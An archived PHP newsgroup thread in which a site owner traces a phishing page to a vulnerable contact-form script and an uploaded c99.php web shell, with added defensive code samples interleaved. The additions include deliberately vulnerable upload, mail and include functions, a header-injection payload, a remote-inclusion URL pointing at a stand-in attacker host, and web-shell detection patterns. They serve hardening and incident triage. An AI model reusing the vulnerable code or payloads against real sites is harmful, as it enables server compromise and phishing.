Home > Archive > PHP Language > April 2007 > Unwilling phishing site host

Robin Faichney

2007-04-10, 6:57 pm

A site I run has somehow been used for phishing. The url was
http://genuine.site/www/scotiabank/com/pe/

I've assured the webhost that I'm not responsible and supplied dates
of more recent ftp and control panel access, and they suggest the
relevant files have been uploaded "via the website itself" but it's a
very simple hand-coded site using PHP only to ease design changes and
such, no bb/blog/whatever features. Can any PHP guru suggest how this
might have happened? It's Windows based, unfortunately, with PHP4.1, I
think, can't check because I can't access it now, it's been disabled.
--
<http://www.robinfaichney.org/>
Steve Belanger

2007-04-10, 6:57 pm

If your site somewhere has an upload feature, and it's not protected by
specific filters, I believe that somebody can upload a PHP file that way and
execute it once it's uploaded. Of course they will need to know where the
file has been saved on the server and so forth, but I believe that's a
potential way of putting files on a server to perform harmful actions.


"Robin Faichney" <robin@robinfaichney.invalid> wrote in message news:dsmn131scn3jhn19ut9tv9knggip8go25s@4ax.com...
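
Steve's point above, as an added example that is not code from the thread or from the contact script it discusses: a PHP upload handler written the way such scripts usually are, beside a hardened version. The form field name (`attachment`), the directory paths and the list of allowed extensions are assumptions; `random_bytes()` needs PHP 7 or later, so a build as old as the one in the thread would have to substitute another source of randomness.

```php
<?php
// Added example, not code from the thread or the contact script it discusses.
// Assumes a form with <input type="file" name="attachment"> and that $file
// is $_FILES['attachment'].

// VULNERABLE: the client-supplied name is used as-is and the file lands
// inside the web root. Uploading "c99.php" gives the attacker a URL that the
// server will execute. $_FILES[...]['type'] is also client-supplied, so
// checking it would not help.
function save_upload_vulnerable(array $file, $webroot)
{
    $dest = $webroot . '/uploads/' . $file['name'];   // attacker controls the name
    return move_uploaded_file($file['tmp_name'], $dest);
}

// HARDENED:
//  - only accept a file the runtime says was uploaded in this request
//  - allow-list of extensions; deny-lists always miss one (.phtml, .php5, ...)
//  - discard the client name and generate our own
//  - refuse content that looks like PHP even when the extension is allowed
//  - store outside the web root so nothing there can be requested directly
function save_upload_hardened(array $file, $store_dir)
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $allowed = array('pdf', 'png', 'jpg', 'gif', 'txt');
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // Peek at the first 4 KiB. Rejecting any "<?" is deliberately coarse
    // (it also rejects XML) but none of the allowed types should start that way.
    $head = file_get_contents($file['tmp_name'], false, null, 0, 4096);
    if ($head === false || stripos($head, '<?') !== false) {
        return false;
    }
    // random_bytes() is PHP 7+; older builds need another CSPRNG source.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $store_dir . '/' . $stored)) {
        return false;
    }
    return $stored;    // the only name the application ever refers to
}

// Example wiring (hypothetical paths):
//   $name = save_upload_hardened($_FILES['attachment'], '/var/site-data/uploads');
//   if ($name === false) { header('HTTP/1.1 400 Bad Request'); exit; }
```

Because the stored file sits outside the document root, the only way to get it back out is through a script that looks the generated name up, sets a fixed Content-Type and calls readfile() on it; the attacker never obtains a URL that runs what they uploaded.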



Robin Faichney

2007-04-11, 3:58 am

On Tue, 10 Apr 2007 19:33:08 GMT, "Steve Belanger" <desktop@ebinformatique.com> wrote:

>If your site somewhere has an upload feature, and it's not protected by
>specific filters, I believe that somebody can upload a PHP file that way and
>execute it once it's uploaded. Of course they will need to know where the
>file has been saved on the server and so forth, but I believe that's a
>potential way of putting files on a server to perform harmful actions.

I have some more info now. We were using the PHP contact script from
http://www.free-php-scripts.net/P/Contact_Form which includes file
upload facilities, though that option was switched off in the config
file. The PHP version is actually 4.4.6, and its config details can be
seen at http://www.theinvisibleeye.org/info.php

Is there anyone in this group who could look at this and check whether
that PHP installation is vulnerable and/or that script could somehow
have been used to upload even though the option was off? Or is there a
more appropriate group for such questions?
--
<http://www.robinfaichney.org/>
C.

2007-04-11, 7:57 am

On 11 Apr, 09:38, Robin Faichney <r...@robinfaichney.invalid> wrote:

Not necessarily; just having a file upload script does not necessarily
mean it can be abused. Also, this is not the only route by which a
blackhat can get their code running on your site.

If possible, I would recommend downloading all the files from the site
and comparing them with a known 'good' copy to try to identify anything
which has been modified. You should search the code from the server
for any include/require/include_once/require_once which has a non-
literal argument.
From your config you have register globals enabled - this is bad.


It is far more likely that the attacker is targeting a vulnerability
in the code you are using - either the contact form (if this uses
email, there are several attacks, including header injection, which can
be used against such forms) or even in the webserver or operating
system itself.

Your first port of call would probably be the author(s) of the
contact form thingy.

HTH

C.
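
C.'s two specific warnings, as an added example that is neither the free-php-scripts contact form nor anything posted in the thread: a mail() call that takes a visitor-supplied header value, and an include whose argument is not a literal, each beside a fixed version. The field names, the fixed From address, the `pages/` directory and the page list are assumptions.

```php
<?php
// Added example, not code from the thread or the contact script it discusses.
// Field names ($_POST['email'], $_GET['page']) and paths are assumptions.

// --- 1. Mail header injection ------------------------------------------
// VULNERABLE: a visitor posts
//   email = "x@example.com\r\nBcc: victim1@example.org, victim2@example.org"
// and the form becomes a relay for spam or phishing mail sent from your host.
// The $subject argument of mail() is a header too, so it is just as exposed.
function send_contact_vulnerable($to, $email, $subject, $body)
{
    return mail($to, $subject, $body, "From: $email");
}

// HARDENED: a header value may never contain CR or LF. Reject rather than
// strip, so an injection attempt fails loudly instead of being "cleaned".
function clean_header_value($v)
{
    if (preg_match('/[\r\n]/', $v)) {
        return false;
    }
    return trim($v);
}

function send_contact_hardened($to, $email, $subject, $body)
{
    $email   = clean_header_value($email);
    $subject = clean_header_value($subject);
    if ($email === false || $subject === false
        || !filter_var($email, FILTER_VALIDATE_EMAIL)) {   // filter_var: PHP 5.2+
        return false;
    }
    // Keep From fixed to our own domain and put the visitor in Reply-To, so
    // the form cannot be used to send mail that appears to come from anyone.
    $headers = "From: contact@genuine.site\r\nReply-To: $email";
    return mail($to, $subject, $body, $headers);
}

// --- 2. include with a non-literal argument ----------------------------
// VULNERABLE: with register_globals=On an uninitialised $page is set from
// ?page=..., so the attacker picks the file. With allow_url_fopen (PHP 4/5.1)
// or allow_url_include (PHP 5.2+) on, "?page=http://evil.example/c99.txt?"
// pulls remote code in; without it, "../" still reaches arbitrary local files.
function show_page_vulnerable($page)
{
    include($page . '.php');
}

// HARDENED: the request value only selects from a fixed list of literal
// paths; nothing the visitor sends ever becomes part of a filename.
function show_page_hardened($page)
{
    $pages = array(
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    );
    if (!isset($pages[$page])) {
        $page = 'home';
    }
    include(dirname(__FILE__) . '/pages/' . $pages[$page]);
}
```

The grep C. suggests is the mechanical version of the second half: any include or require whose argument is a variable, a concatenation or a function result is a candidate for exactly this class of bug, and an allow-list like `$pages` is the usual fix.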

Robin Faichney

2007-04-12, 3:57 am

Thanks for all the comments. I've notified the webhost about register
globals being enabled and I've received the following explanation of
what seems to have happened.

"I still think it is that contact.php page. I am almost certain that the
hacking was done through the website and not FTP or another method. My
guess would be that there is a security flaw somewhere in that contact.php
which is allowing file uploads even though it is disabled. This is backed
up by a quick search on google for "Free-php-Scripts.net contact.php" (as
that's the author site given in the script) for which the results are:
http://www.google.co.uk/search?hl=e...et+contact.php&meta=

One of the entries (there are also other similar ones) is this, which
lists a security flaw in that script:
http://xforce.iss.net/xforce/xfdb/29874

As this is a known vulnerability, hackers probably scanned the internet
for any site using it that they could compromise. There is also a file
called c99.php on your site which is a script designed to help hackers do
whatever they wish (http://www.google.co.uk/search?hl=en&q=c99.php&meta=).
My guess is that this is the file that was uploaded using the security
flaw in the script. Once this was uploaded, they then used it to upload
their phishing scam etc. You should remove this c99.php file before the
site goes back online and check all other files in case of additional
changes the hackers made."
--
<http://www.robinfaichney.org/>
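
The host's advice (remove c99.php, then check every other file) and C.'s earlier advice (diff against a known-good copy, find non-literal includes) combined into one command-line triage script. This is an added example, not something the host or anyone in the thread supplied; the two directory paths are assumptions, and the "known good" copy is whatever clean backup or original script distribution you have.

```php
<?php
// Added example (not from the thread or the host): command-line triage for
// a site that has been used to host a phishing kit. Usage (paths assumed):
//   php triage.php C:\incident\site-download C:\backups\site-known-good

// Map of relative path => content hash for every regular file under $root.
function hash_tree($root)
{
    $root = rtrim($root, '/\\');
    $hashes = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $path => $info) {
        $rel = str_replace('\\', '/', substr($path, strlen($root) + 1));
        $hashes[$rel] = sha1_file($path);
    }
    return $hashes;
}

// Line-by-line scan for (a) web-shell / dropper idioms (c99 and friends) and
// (b) C.'s check: include/require whose argument does not start with a quote.
// It is a triage aid, so false positives (a comment mentioning "include the
// header", include(dirname(__FILE__) . ...)) are expected and cheap to dismiss.
function scan_file($path)
{
    static $shell_patterns = array(
        '/\b(c99|r57)\b/i',
        '/\b(shell_exec|passthru|system|exec|popen|proc_open)\s*\(/i',
        '/\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\b/i',
        '/preg_replace\s*\(\s*[\'"][^\'"]*\/[a-z]*e[a-z]*[\'"]/i', // /e modifier = eval
    );
    static $dyn_include = '/\b(include|require)(_once)?\b\s*\(?\s*(?![\'"])/i';

    $hits  = array();
    $lines = @file($path);
    if ($lines === false) {
        return $hits;
    }
    foreach ($lines as $n => $line) {
        foreach ($shell_patterns as $p) {
            if (preg_match($p, $line)) {
                $hits[] = ($n + 1) . ': shell-like: ' . trim($line);
                break;
            }
        }
        if (preg_match($dyn_include, $line)) {
            $hits[] = ($n + 1) . ': dynamic include: ' . trim($line);
        }
    }
    return $hits;
}

if ($argc < 3) {
    fwrite(STDERR, "usage: php triage.php SITE_DIR GOOD_DIR\n");
    exit(1);
}
$site = hash_tree($argv[1]);
$good = hash_tree($argv[2]);

// 1. What changed? NEW files are the first place to look (c99.php, the
//    phishing pages); MODIFIED files may carry an injected backdoor that
//    survives simply deleting the shell.
foreach ($site as $rel => $h) {
    if (!isset($good[$rel])) {
        echo "NEW       $rel\n";
    } elseif ($good[$rel] !== $h) {
        echo "MODIFIED  $rel\n";
    }
}
foreach (array_diff_key($good, $site) as $rel => $h) {
    echo "MISSING   $rel\n";
}

// 2. Content scan of everything on the live copy, whatever the extension:
//    attackers park PHP in .txt or .jpg files and pull it in via an include.
foreach (array_keys($site) as $rel) {
    foreach (scan_file(rtrim($argv[1], '/\\') . '/' . $rel) as $hit) {
        echo "SUSPECT   $rel:$hit\n";
    }
}
```

Run it against the downloaded site before touching anything, keep the output with the download as the record of what was found, and only then remove the shell and the phishing directory. Hashes are compared with the backup rather than with the live server because, once a shell has run, nothing reported by that server can be trusted.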
Al Kolff

2007-04-17, 6:57 pm


"Robin Faichney" <robin@robinfaichney.invalid> wrote in message news:saaq13ta1h3jvn4rnm8nvog2qku6vhjuh8@4ax.com...


Robin,
While I love PHP, this is one of those times it might pay to use Perl along
with PHP. Contact pages and forms are gateways to all kinds of problems.
"nms formmail" works great and is fairly secure. (Just don't emulate Matt's
formmail or turn off the security features.)

To protect yourself from the script kiddies, rename your scripts and files
and modify your code to match. How do I know these things? Being
blacklisted is no picnic to overcome.

God bless,
al





Copyright 2008 codecomments.com